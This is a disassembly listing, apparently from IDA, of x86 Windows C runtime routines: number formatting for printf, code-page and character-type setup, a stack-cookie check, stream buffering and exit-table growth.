loc_422870: ; CODE XREF: sub_4222C8+59D�j
mov ecx, [ebp+1D4h+var_220]
mov [eax], ecx
loc_422875: ; CODE XREF: sub_4222C8+5A6�j
mov [ebp+1D4h+var_238], 1
jmp loc_422A66
; ---------------------------------------------------------------------------
loc_422881: ; CODE XREF: sub_4222C8+380�j
add [ebp+1D4h+arg_8], 4
test bl, 20h
mov eax, [ebp+1D4h+arg_8]
jz short loc_4228A5
test bl, 40h
jz short loc_42289F
movsx eax, word ptr [eax-4]
loc_42289C: ; CODE XREF: sub_4222C8+5DB�j
; sub_4222C8+5E3�j
cdq
jmp short loc_4228AF
; ---------------------------------------------------------------------------
loc_42289F: ; CODE XREF: sub_4222C8+5CE�j
movzx eax, word ptr [eax-4]
jmp short loc_42289C
; ---------------------------------------------------------------------------
loc_4228A5: ; CODE XREF: sub_4222C8+5C9�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_42289C
xor edx, edx
loc_4228AF: ; CODE XREF: sub_4222C8+39A�j
; sub_4222C8+5D5�j
test bl, 40h
jz short loc_4228C9
test edx, edx
jg short loc_4228C9
jl short loc_4228BE
test eax, eax
jnb short loc_4228C9
loc_4228BE: ; CODE XREF: sub_4222C8+5F0�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+1D4h+var_210+1], 1
loc_4228C9: ; CODE XREF: sub_4222C8+5EA�j
; sub_4222C8+5EE�j ...
test [ebp+1D4h+var_210], esi
mov ebx, eax
mov edi, edx
jnz short loc_4228D4
xor edi, edi
loc_4228D4: ; CODE XREF: sub_4222C8+608�j
cmp [ebp+1D4h+var_214], 0
jge short loc_4228E3
mov [ebp+1D4h+var_214], 1
jmp short loc_4228F4
; ---------------------------------------------------------------------------
loc_4228E3: ; CODE XREF: sub_4222C8+610�j
and [ebp+1D4h+var_210], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+1D4h+var_214], eax
jle short loc_4228F4
mov [ebp+1D4h+var_214], eax
loc_4228F4: ; CODE XREF: sub_4222C8+619�j
; sub_4222C8+627�j
mov eax, ebx
or eax, edi
jnz short loc_4228FE
and [ebp+1D4h+var_228], 0
loc_4228FE: ; CODE XREF: sub_4222C8+630�j
lea esi, [ebp+1D4h+var_D]
loc_422904: ; CODE XREF: sub_4222C8+66E�j
mov eax, [ebp+1D4h+var_214]
dec [ebp+1D4h+var_214]
test eax, eax
jg short loc_422914
mov eax, ebx
or eax, edi
jz short loc_422938
loc_422914: ; CODE XREF: sub_4222C8+644�j
mov eax, [ebp+1D4h+var_21C]
cdq
push edx
push eax
push edi
push ebx
call sub_420890
add ecx, 30h
cmp ecx, 39h
mov [ebp+1D4h+var_248], ebx
mov ebx, eax
mov edi, edx
jle short loc_422933
add ecx, [ebp+1D4h+var_23C]
loc_422933: ; CODE XREF: sub_4222C8+666�j
mov [esi], cl
dec esi
jmp short loc_422904
; ---------------------------------------------------------------------------
loc_422938: ; CODE XREF: sub_4222C8+64A�j
lea eax, [ebp+1D4h+var_D]
sub eax, esi
inc esi
test byte ptr [ebp+1D4h+var_210+1], 2
mov [ebp+1D4h+var_21C], eax
mov [ebp+1D4h+var_218], esi
jz short loc_422965
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_422958
test eax, eax
jnz short loc_422965
loc_422958: ; CODE XREF: sub_4222C8+68A�j
dec [ebp+1D4h+var_218]
mov ecx, [ebp+1D4h+var_218]
mov byte ptr [ecx], 30h
inc eax
loc_422962: ; CODE XREF: sub_4222C8+3EA�j
; sub_4222C8+3F3�j ...
mov [ebp+1D4h+var_21C], eax
loc_422965: ; CODE XREF: sub_4222C8+296�j
; sub_4222C8+365�j ...
cmp [ebp+1D4h+var_238], 0
jnz loc_422A66
mov ebx, [ebp+1D4h+var_210]
test bl, 40h
jz short loc_42299D
test bh, 1
jz short loc_422982
mov [ebp+1D4h+var_224], 2Dh
jmp short loc_422996
; ---------------------------------------------------------------------------
loc_422982: ; CODE XREF: sub_4222C8+6B2�j
test bl, 1
jz short loc_42298D
mov [ebp+1D4h+var_224], 2Bh
jmp short loc_422996
; ---------------------------------------------------------------------------
loc_42298D: ; CODE XREF: sub_4222C8+6BD�j
test bl, 2
jz short loc_42299D
mov [ebp+1D4h+var_224], 20h
loc_422996: ; CODE XREF: sub_4222C8+6B8�j
; sub_4222C8+6C3�j
mov [ebp+1D4h+var_228], 1
loc_42299D: ; CODE XREF: sub_4222C8+6AD�j
; sub_4222C8+6C8�j
mov esi, [ebp+1D4h+var_22C]
sub esi, [ebp+1D4h+var_228]
sub esi, [ebp+1D4h+var_21C]
test bl, 0Ch
jnz short loc_4229BF
push [ebp+1D4h+arg_0]
lea eax, [ebp+1D4h+var_220]
push esi
push 20h
call sub_42226D
add esp, 0Ch
loc_4229BF: ; CODE XREF: sub_4222C8+6E1�j
push [ebp+1D4h+var_228]
mov edi, [ebp+1D4h+arg_0]
lea eax, [ebp+1D4h+var_220]
lea ecx, [ebp+1D4h+var_224]
call sub_422291
test bl, 8
pop ecx
jz short loc_4229ED
test bl, 4
jnz short loc_4229ED
push edi
push esi
push 30h
lea eax, [ebp+1D4h+var_220]
call sub_42226D
add esp, 0Ch
loc_4229ED: ; CODE XREF: sub_4222C8+70F�j
; sub_4222C8+714�j
cmp [ebp+1D4h+var_230], 0
jz short loc_422A3D
cmp [ebp+1D4h+var_21C], 0
jle short loc_422A3D
mov eax, [ebp+1D4h+var_21C]
mov ebx, [ebp+1D4h+var_218]
mov [ebp+1D4h+var_248], eax
loc_422A02: ; CODE XREF: sub_4222C8+771�j
dec [ebp+1D4h+var_248]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+1D4h+var_C]
push eax
call sub_426D3A
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_422A4C
mov edi, [ebp+1D4h+arg_0]
push eax
lea eax, [ebp+1D4h+var_220]
lea ecx, [ebp+1D4h+var_C]
call sub_422291
cmp [ebp+1D4h+var_248], 0
pop ecx
jnz short loc_422A02
jmp short loc_422A4C
; ---------------------------------------------------------------------------
loc_422A3D: ; CODE XREF: sub_4222C8+729�j
; sub_4222C8+72F�j
push [ebp+1D4h+var_21C]
mov ecx, [ebp+1D4h+var_218]
lea eax, [ebp+1D4h+var_220]
call sub_422291
pop ecx
loc_422A4C: ; CODE XREF: sub_4222C8+755�j
; sub_4222C8+773�j
test byte ptr [ebp+1D4h+var_210], 4
jz short loc_422A66
push [ebp+1D4h+arg_0]
lea eax, [ebp+1D4h+var_220]
push esi
push 20h
call sub_42226D
add esp, 0Ch
loc_422A66: ; CODE XREF: sub_4222C8+5B4�j
; sub_4222C8+6A1�j ...
cmp [ebp+1D4h+var_234], 0
jz short loc_422A79 ; default
push [ebp+1D4h+var_234]
call sub_41E2A1
and [ebp+1D4h+var_234], 0
pop ecx
loc_422A79: ; CODE XREF: sub_4222C8+7F�j
; sub_4222C8+A4�j ...
mov edi, [ebp+1D4h+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_422305
loc_422A89: ; CODE XREF: sub_4222C8+4B�j
pop edi
pop esi
loc_422A8B: ; CODE XREF: sub_4222C8+31�j
mov ecx, [ebp+1D4h+var_4]
mov eax, [ebp+1D4h+var_220]
pop ebx
call sub_422B83
add ebp, 1D4h
leave
retn
sub_4222C8 endp
; ---------------------------------------------------------------------------
off_422AA2 dd offset loc_4224E4 ; DATA XREF: sub_4222C8+85�r
dd offset loc_422354 ; jump table for switch statement
dd offset loc_422371
dd offset loc_4223BD
dd offset loc_4223FE
dd offset loc_422407
dd offset loc_422445
dd offset loc_422526
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422AC2 proc near ; CODE XREF: sub_41E755+C�p
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
cmp ecx, 0FFh
jbe short loc_422B2F
and [ebp+var_4], 0
push edi
xor eax, eax
lea edi, [ebp+var_2]
stosw
mov eax, ecx
shr eax, 8
cmp ds:dword_4E2CA4, 0
mov byte ptr [ebp+arg_0+2], al
mov byte ptr [ebp+arg_0+3], cl
pop edi
jnz short loc_422AF7
loc_422AF3: ; CODE XREF: sub_422AC2+59�j
; sub_422AC2+60�j ...
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_422AF7: ; CODE XREF: sub_422AC2+2F�j
push 1
push ds:dword_4E2CA0
lea eax, [ebp+var_4]
push ds:dword_4E2DC4
push eax
push 2
lea eax, [ebp+arg_0+2]
push eax
push 1
call sub_426DA0
add esp, 1Ch
test eax, eax
jz short loc_422AF3
cmp [ebp+var_2], 0
jnz short loc_422AF3
test byte ptr [ebp+var_4], 8
jz short loc_422AF3
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_422B2F: ; CODE XREF: sub_422AC2+D�j
cmp ds:dword_4437B0, 1
jle short loc_422B44
push 8
push ecx
call sub_422B91
pop ecx
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_422B44: ; CODE XREF: sub_422AC2+74�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
leave
retn
sub_422AC2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422B83
loc_422B52: ; CODE XREF: sub_422B83:loc_422B8C�j
push 8
push offset dword_439550
call sub_425F14
and dword ptr [ebp-4], 0
push 0
push 1
call sub_426FC0
pop ecx
pop ecx
jmp short loc_422B76
; END OF FUNCTION CHUNK FOR sub_422B83
; ---------------------------------------------------------------------------
db 33h
dd 8BC340C0h
db 65h, 0E8h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422B83
loc_422B76: ; CODE XREF: sub_422B83-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call ds:dword_42B000 ; ExitProcess
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_422B83
; =============== S U B R O U T I N E =======================================
sub_422B83 proc near ; CODE XREF: sub_41E7B2+A6�p
; sub_4222C8+7CD�p ...
; FUNCTION CHUNK AT 00422B52 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00422B76 SIZE 0000000D BYTES
cmp ecx, ds:dword_4437D4
jnz short loc_422B8C
retn
; ---------------------------------------------------------------------------
loc_422B8C: ; CODE XREF: sub_422B83+6�j
jmp loc_422B52
sub_422B83 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422B91 proc near ; CODE XREF: sub_41EAB4+22�p
; sub_420AD5+F�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_422BAF
mov ecx, ds:off_4437D8
movzx eax, word ptr [ecx+eax*2]
jmp short loc_422C0A
; ---------------------------------------------------------------------------
loc_422BAF: ; CODE XREF: sub_422B91+10�j
mov ecx, eax
sar ecx, 8
push esi
mov esi, ds:off_4437D8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_422BD5
push 2
mov [ebp+var_3], al
mov [ebp+var_4], cl
mov [ebp+var_2], 0
pop eax
jmp short loc_422BDF
; ---------------------------------------------------------------------------
loc_422BD5: ; CODE XREF: sub_422B91+33�j
mov [ebp+var_4], al
xor eax, eax
mov [ebp+var_3], 0
inc eax
loc_422BDF: ; CODE XREF: sub_422B91+42�j
push 1
push ds:dword_4E29A4
lea ecx, [ebp+arg_0+2]
push ds:dword_4E29B4
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_426DA0
add esp, 1Ch
test eax, eax
jnz short loc_422C06
leave
retn
; ---------------------------------------------------------------------------
loc_422C06: ; CODE XREF: sub_422B91+71�j
movzx eax, word ptr [ebp+arg_0+2]
loc_422C0A: ; CODE XREF: sub_422B91+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_422B91 endp
; =============== S U B R O U T I N E =======================================
sub_422C0F proc near ; CODE XREF: sub_41EC78+1D�p
; sub_42065F+16�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_4E28F8, eax
xor ecx, ecx
loc_422C1A: ; CODE XREF: sub_422C0F+18�j
cmp eax, ds:dword_4437E0[ecx*8]
jz short loc_422C3E
inc ecx
cmp ecx, 2Dh
jb short loc_422C1A
cmp eax, 13h
jb short loc_422C4B
cmp eax, 24h
ja short loc_422C4B
mov ds:dword_4E28F4, 0Dh
retn
; ---------------------------------------------------------------------------
loc_422C3E: ; CODE XREF: sub_422C0F+12�j
mov eax, ds:dword_4437E4[ecx*8]
mov ds:dword_4E28F4, eax
retn
; ---------------------------------------------------------------------------
loc_422C4B: ; CODE XREF: sub_422C0F+1D�j
; sub_422C0F+22�j
cmp eax, 0BCh
jb short loc_422C63
cmp eax, 0CAh
mov ds:dword_4E28F4, 8
jbe short locret_422C6D
loc_422C63: ; CODE XREF: sub_422C0F+41�j
mov ds:dword_4E28F4, 16h
locret_422C6D: ; CODE XREF: sub_422C0F+52�j
retn
sub_422C0F endp
; =============== S U B R O U T I N E =======================================
sub_422C6E proc near ; CODE XREF: sub_41ECA2+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_426D13
test eax, eax
pop ecx
jz short loc_422CF2
cmp esi, offset dword_443520
jnz short loc_422C8C
xor eax, eax
jmp short loc_422C97
; ---------------------------------------------------------------------------
loc_422C8C: ; CODE XREF: sub_422C6E+18�j
cmp esi, offset dword_443540
jnz short loc_422CF2
xor eax, eax
inc eax
loc_422C97: ; CODE XREF: sub_422C6E+1C�j
inc ds:dword_4E2944
test word ptr [esi+0Ch], 10Ch
jnz short loc_422CF2
push ebx
push edi
lea edi, ds:4E2968h[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_422CD8
push ebx
call sub_41E5D3
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_422CD8
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_422CE5
; ---------------------------------------------------------------------------
loc_422CD8: ; CODE XREF: sub_422C6E+48�j
; sub_422C6E+55�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_422CE5: ; CODE XREF: sub_422C6E+68�j
or word ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_422CF2: ; CODE XREF: sub_422C6E+10�j
; sub_422C6E+24�j ...
xor eax, eax
pop esi
retn
sub_422C6E endp
; =============== S U B R O U T I N E =======================================
sub_422CF6 proc near ; CODE XREF: sub_41ECA2+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_422D1F
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_422D30
push esi
call sub_420FC7
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
jmp short loc_422D2F
; ---------------------------------------------------------------------------
loc_422D1F: ; CODE XREF: sub_422CF6+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_422D30
push eax
call sub_420FC7
loc_422D2F: ; CODE XREF: sub_422CF6+27�j
pop ecx
loc_422D30: ; CODE XREF: sub_422CF6+10�j
; sub_422CF6+31�j
pop esi
retn
sub_422CF6 endp
; =============== S U B R O U T I N E =======================================
sub_422D32 proc near ; CODE XREF: sub_422F16+157�p
; sub_422F16+19C�p
sub eax, 3A4h
jz short loc_422D5B
sub eax, 4
jz short loc_422D55
sub eax, 0Dh
jz short loc_422D4F
dec eax
jz short loc_422D49
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_422D49: ; CODE XREF: sub_422D32+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_422D4F: ; CODE XREF: sub_422D32+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_422D55: ; CODE XREF: sub_422D32+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_422D5B: ; CODE XREF: sub_422D32+5�j
mov eax, 411h
retn
sub_422D32 endp
; =============== S U B R O U T I N E =======================================
sub_422D61 proc near ; CODE XREF: sub_422F16:loc_4230DE�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4E2CC0
rep stosd
stosb
xor eax, eax
mov ds:dword_4E2DC4, eax
mov ds:dword_4E2CA4, eax
mov ds:dword_4E2CA0, eax
mov edi, offset dword_4E2DD0
stosd
stosd
stosd
pop edi
retn
sub_422D61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D8A proc near ; CODE XREF: sub_422F16:loc_4230E3�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, ds:dword_4437D4
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_18]
push eax
push ds:dword_4E2DC4
call ds:dword_42B190 ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_422EC7
xor eax, eax
loc_422DBC: ; CODE XREF: sub_422D8A+3C�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_422DBC
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_422E0C
push ebx
lea edx, [ebp+var_11]
push edi
loc_422DDB: ; CODE XREF: sub_422D8A+7E�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_422E02
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_422E02: ; CODE XREF: sub_422D8A+59�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_422DDB
pop edi
pop ebx
loc_422E0C: ; CODE XREF: sub_422D8A+4A�j
push 0
push ds:dword_4E2CA0
lea eax, [ebp+var_518]
push ds:dword_4E2DC4
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_426DA0
push 0
push ds:dword_4E2DC4
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push ds:dword_4E2CA0
call sub_425B55
push 0
push ds:dword_4E2DC4
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push ds:dword_4E2CA0
call sub_425B55
add esp, 5Ch
xor eax, eax
loc_422E81: ; CODE XREF: sub_422D8A+139�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_422EA4
or ds:byte_4E2CC1[eax], 10h
mov cl, [ebp+eax+var_218]
loc_422E9C: ; CODE XREF: sub_422D8A+12D�j
mov ds:byte_4E2DE0[eax], cl
jmp short loc_422EC0
; ---------------------------------------------------------------------------
loc_422EA4: ; CODE XREF: sub_422D8A+102�j
test cl, 2
jz short loc_422EB9
or ds:byte_4E2CC1[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_422E9C
; ---------------------------------------------------------------------------
loc_422EB9: ; CODE XREF: sub_422D8A+11D�j
mov ds:byte_4E2DE0[eax], 0
loc_422EC0: ; CODE XREF: sub_422D8A+118�j
inc eax
cmp eax, esi
jb short loc_422E81
jmp short loc_422F0B
; ---------------------------------------------------------------------------
loc_422EC7: ; CODE XREF: sub_422D8A+2A�j
xor eax, eax
loc_422EC9: ; CODE XREF: sub_422D8A+17F�j
cmp eax, 41h
jb short loc_422EE7
cmp eax, 5Ah
ja short loc_422EE7
or ds:byte_4E2CC1[eax], 10h
mov cl, al
add cl, 20h
loc_422EDF: ; CODE XREF: sub_422D8A+173�j
mov ds:byte_4E2DE0[eax], cl
jmp short loc_422F06
; ---------------------------------------------------------------------------
loc_422EE7: ; CODE XREF: sub_422D8A+142�j
; sub_422D8A+147�j
cmp eax, 61h
jb short loc_422EFF
cmp eax, 7Ah
ja short loc_422EFF
or ds:byte_4E2CC1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_422EDF
; ---------------------------------------------------------------------------
loc_422EFF: ; CODE XREF: sub_422D8A+160�j
; sub_422D8A+165�j
mov ds:byte_4E2DE0[eax], 0
loc_422F06: ; CODE XREF: sub_422D8A+15B�j
inc eax
cmp eax, esi
jb short loc_422EC9
loc_422F0B: ; CODE XREF: sub_422D8A+13B�j
mov ecx, [ebp+var_4]
pop esi
call sub_422B83
leave
retn
sub_422D8A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422F16 proc near ; CODE XREF: sub_4230FC+B�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, ds:dword_4437D4
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, 0FFFFFFFEh
mov [ebp+var_4], eax
push edi
mov ds:dword_4E2970, ebx
jnz short loc_422F49
mov ds:dword_4E2970, 1
call ds:dword_42B1C4 ; GetOEMCP
jmp short loc_422F74
; ---------------------------------------------------------------------------
loc_422F49: ; CODE XREF: sub_422F16+1F�j
cmp esi, 0FFFFFFFDh
jnz short loc_422F60
mov ds:dword_4E2970, 1
call ds:dword_42B1C0 ; GetACP
jmp short loc_422F74
; ---------------------------------------------------------------------------
loc_422F60: ; CODE XREF: sub_422F16+36�j
cmp esi, 0FFFFFFFCh
jnz short loc_422F79
mov eax, ds:dword_4E29B4
mov ds:dword_4E2970, 1
loc_422F74: ; CODE XREF: sub_422F16+31�j
; sub_422F16+48�j
mov [ebp+arg_0], eax
mov esi, eax
loc_422F79: ; CODE XREF: sub_422F16+4D�j
cmp esi, ds:dword_4E2DC4
jz loc_4230E8
cmp esi, ebx
jz loc_4230DE
xor edx, edx
xor eax, eax
loc_422F91: ; CODE XREF: sub_422F16+8C�j
cmp ds:dword_443950[eax], esi
jz short loc_423000
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_422F91
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_42B190 ; GetCPInfo
cmp eax, 1
jnz loc_4230D6
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4E2CC0
rep stosd
stosb
xor edi, edi
inc edi
cmp [ebp+var_18], edi
mov ds:dword_4E2DC4, esi
mov ds:dword_4E2CA0, ebx
jbe loc_4230C4
cmp [ebp+var_12], 0
jz loc_42309F
lea ecx, [ebp+var_11]
loc_422FEA: ; CODE XREF: sub_422F16+183�j
mov dl, [ecx]
test dl, dl
jz loc_42309F
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_42308F
; ---------------------------------------------------------------------------
loc_423000: ; CODE XREF: sub_422F16+81�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4E2CC0
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_1C], ebx
stosb
lea ebx, dword_443960[ecx]
loc_42301C: ; CODE XREF: sub_422F16+143�j
mov al, [ebx]
mov esi, ebx
jmp short loc_42304B
; ---------------------------------------------------------------------------
loc_423022: ; CODE XREF: sub_422F16+137�j
mov dl, [esi+1]
test dl, dl
jz short loc_42304F
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_423047
mov edx, [ebp+var_1C]
mov dl, ds:byte_443948[edx]
loc_42303C: ; CODE XREF: sub_422F16+12F�j
or ds:byte_4E2CC1[eax], dl
inc eax
cmp eax, edi
jbe short loc_42303C
loc_423047: ; CODE XREF: sub_422F16+11B�j
inc esi
inc esi
mov al, [esi]
loc_42304B: ; CODE XREF: sub_422F16+10A�j
test al, al
jnz short loc_423022
loc_42304F: ; CODE XREF: sub_422F16+111�j
inc [ebp+var_1C]
add ebx, 8
cmp [ebp+var_1C], 4
jb short loc_42301C
mov eax, [ebp+arg_0]
mov ds:dword_4E2DC4, eax
mov ds:dword_4E2CA4, 1
call sub_422D32
lea esi, dword_443954[ecx]
mov edi, offset dword_4E2DD0
movsd
movsd
mov ds:dword_4E2CA0, eax
movsd
jmp short loc_4230E3
; ---------------------------------------------------------------------------
loc_423087: ; CODE XREF: sub_422F16+17B�j
or ds:byte_4E2CC1[eax], 4
inc eax
loc_42308F: ; CODE XREF: sub_422F16+E5�j
cmp eax, edx
jbe short loc_423087
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_422FEA
loc_42309F: ; CODE XREF: sub_422F16+CB�j
; sub_422F16+D8�j
mov eax, edi
loc_4230A1: ; CODE XREF: sub_422F16+198�j
or ds:byte_4E2CC1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4230A1
mov eax, esi
call sub_422D32
mov ds:dword_4E2CA0, eax
mov ds:dword_4E2CA4, edi
jmp short loc_4230CA
; ---------------------------------------------------------------------------
loc_4230C4: ; CODE XREF: sub_422F16+C1�j
mov ds:dword_4E2CA4, ebx
loc_4230CA: ; CODE XREF: sub_422F16+1AC�j
xor eax, eax
mov edi, offset dword_4E2DD0
stosd
stosd
stosd
jmp short loc_4230E3
; ---------------------------------------------------------------------------
loc_4230D6: ; CODE XREF: sub_422F16+9C�j
cmp ds:dword_4E2970, ebx
jz short loc_4230EC
loc_4230DE: ; CODE XREF: sub_422F16+71�j
call sub_422D61
loc_4230E3: ; CODE XREF: sub_422F16+16F�j
; sub_422F16+1BE�j
call sub_422D8A
loc_4230E8: ; CODE XREF: sub_422F16+69�j
xor eax, eax
jmp short loc_4230EF
; ---------------------------------------------------------------------------
loc_4230EC: ; CODE XREF: sub_422F16+1C6�j
or eax, 0FFFFFFFFh
loc_4230EF: ; CODE XREF: sub_422F16+1D4�j
mov ecx, [ebp+var_4]
pop edi
pop esi
pop ebx
call sub_422B83
leave
retn
sub_422F16 endp
; =============== S U B R O U T I N E =======================================
sub_4230FC proc near ; CODE XREF: sub_42638A+C�p
; sub_4263E7+D�p ...
cmp ds:dword_4E3F30, 0
jnz short loc_423117
push 0FFFFFFFDh
call sub_422F16
pop ecx
mov ds:dword_4E3F30, 1
loc_423117: ; CODE XREF: sub_4230FC+7�j
xor eax, eax
retn
sub_4230FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42311A proc near ; CODE XREF: sub_41ED01+2C�p
; sub_41ED01+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp ds:dword_4E2CA4, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_42313E
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_41E860
add esp, 0Ch
jmp short loc_423186
; ---------------------------------------------------------------------------
loc_42313E: ; CODE XREF: sub_42311A+11�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_423183
mov edx, [ebp+arg_4]
push esi
loc_423149: ; CODE XREF: sub_42311A+77�j
mov al, [edx]
movzx esi, al
dec ecx
test ds:byte_4E2CC1[esi], 4
mov [edi], al
jz short loc_423189
inc edi
inc edx
test ecx, ecx
jz short loc_423195
mov al, [edx]
dec ecx
mov [edi], al
inc edi
inc edx
test al, al
jnz short loc_42318F
mov [edi-2], al
loc_42316E: ; CODE XREF: sub_42311A+73�j
test ecx, ecx
jz short loc_423182
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_423182: ; CODE XREF: sub_42311A+56�j
; sub_42311A+79�j ...
pop esi
loc_423183: ; CODE XREF: sub_42311A+29�j
mov eax, [ebp+arg_0]
loc_423186: ; CODE XREF: sub_42311A+22�j
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_423189: ; CODE XREF: sub_42311A+3E�j
inc edi
inc edx
test al, al
jz short loc_42316E
loc_42318F: ; CODE XREF: sub_42311A+4F�j
test ecx, ecx
jnz short loc_423149
jmp short loc_423182
; ---------------------------------------------------------------------------
loc_423195: ; CODE XREF: sub_42311A+44�j
mov byte ptr [edi-1], 0
jmp short loc_423182
sub_42311A endp
; =============== S U B R O U T I N E =======================================
sub_42319B proc near ; CODE XREF: sub_42321D+4�p
arg_0 = dword ptr 4
push esi
push ds:dword_4E3F2C
call sub_427108
pop ecx
mov ecx, ds:dword_4E3F28
mov esi, eax
mov eax, ds:dword_4E3F2C
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_42320E
mov ecx, 800h
cmp esi, ecx
jnb short loc_4231CB
mov ecx, esi
loc_4231CB: ; CODE XREF: sub_42319B+2C�j
add ecx, esi
push ecx
push eax
call sub_41E3C2
test eax, eax
pop ecx
pop ecx
jnz short loc_4231F1
add esi, 10h
push esi
push ds:dword_4E3F2C
call sub_41E3C2
test eax, eax
pop ecx
pop ecx
jnz short loc_4231F1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4231F1: ; CODE XREF: sub_42319B+3D�j
; sub_42319B+52�j
mov ecx, ds:dword_4E3F28
sub ecx, ds:dword_4E3F2C
mov ds:dword_4E3F2C, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov ds:dword_4E3F28, ecx
loc_42320E: ; CODE XREF: sub_42319B+23�j
mov eax, [esp+4+arg_0]
mov [ecx], eax
add ds:dword_4E3F28, 4
pop esi
retn
sub_42319B endp
; =============== S U B R O U T I N E =======================================
